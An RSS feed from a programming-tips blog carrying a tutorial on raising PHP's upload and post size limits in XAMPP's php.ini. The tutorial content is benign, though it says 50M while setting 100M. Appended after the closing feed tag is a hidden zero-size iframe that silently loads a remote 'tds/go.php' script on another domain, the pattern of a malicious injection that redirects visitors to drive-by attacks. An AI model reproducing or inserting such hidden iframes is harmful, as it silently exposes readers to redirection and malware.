<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>dijexi.com &#187; xampp</title>
	<atom:link href="http://www.dijexi.com/category/xampp/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.dijexi.com</link>
	<description>free programming tutorial, tips and tricks on php, codeigniter, delphi, dotnet, ajax and more..</description>
	<lastBuildDate>Fri, 13 Jan 2012 23:21:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<atom:link rel="hub" href="http://pubsubhubbub.appspot.com"/><atom:link rel="hub" href="http://superfeedr.com/hubbub"/>		<item>
		<title>How to change upload file size on a Windows localhost</title>
		<link>http://www.dijexi.com/2009/06/how-to-change-upload-file-size-on-a-windows-localhost/</link>
		<comments>http://www.dijexi.com/2009/06/how-to-change-upload-file-size-on-a-windows-localhost/#comments</comments>
		<pubDate>Wed, 01 Jul 2009 04:49:41 +0000</pubDate>
		<dc:creator>akhmad daniel sembiring</dc:creator>
				<category><![CDATA[Moodle]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[xampp]]></category>
		<category><![CDATA[php.ini]]></category>
		<category><![CDATA[post_max_filesize]]></category>
		<category><![CDATA[upload_max_filesize]]></category>

		<guid isPermaLink="false">http://www.dijexi.com/2009/06/how-to-change-upload-file-size-on-a-windows-localhost/</guid>
		<description><![CDATA[In a localhost Apache + PHP it is easy to change the uploaded file size to something larger than the default 16M. An example below show you how to change the upload file size to say 50M. Locate the PHP.ini file, for example in c:/xampp/Apache/bin/php.ini and open it with any text editor like WordPad by [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>In a localhost <a class="zem_slink" title="Apache" rel="wikipedia" href="http://en.wikipedia.org/wiki/Apache">Apache</a> + <a class="zem_slink" title="PHP" rel="homepage" href="http://php.net/">PHP</a> it is easy to change the uploaded <a class="zem_slink" title="File size" rel="wikipedia" href="http://en.wikipedia.org/wiki/File_size">file size</a> to something larger than the default 16M.</p>
<p>An example below show you how to change the upload file size to say 50M.</p>
<ul>
<li>Locate the PHP.ini file, for example in <strong>c:/xampp/Apache/bin/php.ini</strong> and open it with any <a class="zem_slink" title="Text editor" rel="wikipedia" href="http://en.wikipedia.org/wiki/Text_editor">text editor</a> like <a class="zem_slink" title="WordPad" rel="wikipedia" href="http://en.wikipedia.org/wiki/WordPad">WordPad</a> by right-clicking -&gt; Open With -&gt; then choose WordPad.</li>
</ul>
<p><span id="more-388"></span></p>
<ul>
<li>In this file scroll or do a search on the text &#8220;_max_&#8221; to find</li>
</ul>
<blockquote><p><code>upload_max_filesize = 16M</code></p></blockquote>
<ul>
<li>modify that line to</li>
</ul>
<blockquote>
<pre>upload_max_filesize = 100M</pre>
</blockquote>
<ul>
<li>In the same way, find</li>
</ul>
<blockquote><p><code>post_max_size = 16M</code></p></blockquote>
<ul>
<li>modify that line to</li>
</ul>
<blockquote>
<pre>post_max_size = 100M</pre>
</blockquote>
<ul>
<li>Save the file.</li>
</ul>
<p>After any changes to the php.ini file you need to restart Apache. So restart <a class="zem_slink" title="XAMPP" rel="homepage" href="http://www.apachefriends.org/en/xampp.html">XAMPP</a> and browse to localhost. You should find that the <a class="zem_slink" title="Upload" rel="homepage" href="http://www.slideshare.net/upload?type=powerpoint">Upload</a> file size in Configuration now reads 50M.</p>
<p>To check the effect, run the phpinfo facility provided by XAMPP or you can create your own simple PHP script file which consists only this code:</p>
<blockquote><p>&lt;?php</p>
<p>phpinfo();</p>
<p>?&gt;</p></blockquote>
<p>Save the file on the document root folder, for example c:\xampp\htdocs\phpinfo.php, then open it from your browser at <a href="http://localhost/phpinfo.php">http://localhost/phpinfo.php</a>.</p>
<div class="zemanta-related">
<h6 class="zemanta-related-title" style="font-size: 1em">Related articles by Zemanta</h6>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://garinungkadol.com/2009/xampp-pretty-permalinks-wordpress/">XAMPP + Pretty Permalinks in WordPress </a>(garinungkadol.com)</li>
<li class="zemanta-article-ul-li"><a href="http://www.arunpattnaik.com/2009/04/resolved-localhost-not-working/">Resolved: localhost not working </a>(arunpattnaik.com)</li>
<li class="zemanta-article-ul-li"><a href="http://www.mt-soft.com.ar/2009/06/27/how-to-set-up-php-5-with-curl-and-mysql-support-on-windows/">How to set up PHP 5 with Curl and MySQL support on Windows </a>(mt-soft.com.ar)</li>
<li class="zemanta-article-ul-li"><a href="http://www.latenightpc.com/blog/archives/2008/12/20/tip-for-xdebug-on-ubuntu-810-with-eclipse-pdt">Tip for XDebug on Ubuntu 8.10 with Eclipse PDT </a>(latenightpc.com)</li>
<li class="zemanta-article-ul-li"><a href="http://www.slideshare.net/som_nangia/coding-standards-1663210">Coding Standards </a>(slideshare.net)</li>
</ul>
</div>
<div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"><a class="zemanta-pixie-a" title="Reblog this post [with Zemanta]" href="http://reblog.zemanta.com/zemified/cffa6275-cdba-4fc2-841b-61632a86c758/"><img class="zemanta-pixie-img" style="border-bottom-style: none; border-right-style: none; border-top-style: none; float: right; border-left-style: none" src="http://img.zemanta.com/reblog_e.png?x-id=cffa6275-cdba-4fc2-841b-61632a86c758" alt="Reblog this post [with Zemanta]" /></a></div>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://www.dijexi.com/2009/09/why-upload-com-is-the-best-e-book-website-for-publishing-e-books-free-of-charge/" rel="bookmark">Why Upload.com Is the Best E-Book Website For Publishing E-Books Free of Charge</a></li><li><a href="http://www.dijexi.com/2008/04/me-restore-database-postgresql-dari-windows-ke-linux/" rel="bookmark">Me-Restore database PostgreSQL dari Windows ke Linux</a></li><li><a href="http://www.dijexi.com/2009/07/best-free-imaging-tools-graphics-3d-software-image-managers-software/" rel="bookmark">Best Free Imaging Tools, Graphics, 3D Software, Image Managers Software</a></li><li><a href="http://www.dijexi.com/2009/07/zero-day-vulnerability-hits-microsoft-directshow/" rel="bookmark">Zero Day Vulnerability Hits Microsoft DirectShow</a></li><li><a href="http://www.dijexi.com/2009/07/reload-editor-installation/" rel="bookmark">Reload Editor Installation</a></li></ul></div><!--INFOLINKS_OFF--><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fwww.dijexi.com%2F2009%2F06%2Fhow-to-change-upload-file-size-on-a-windows-localhost%2F&amp;linkname=How%20to%20change%20upload%20file%20size%20on%20a%20Windows%20localhost"><img src="http://www.dijexi.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a>]]></content:encoded>
			<wfw:commentRss>http://www.dijexi.com/2009/06/how-to-change-upload-file-size-on-a-windows-localhost/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
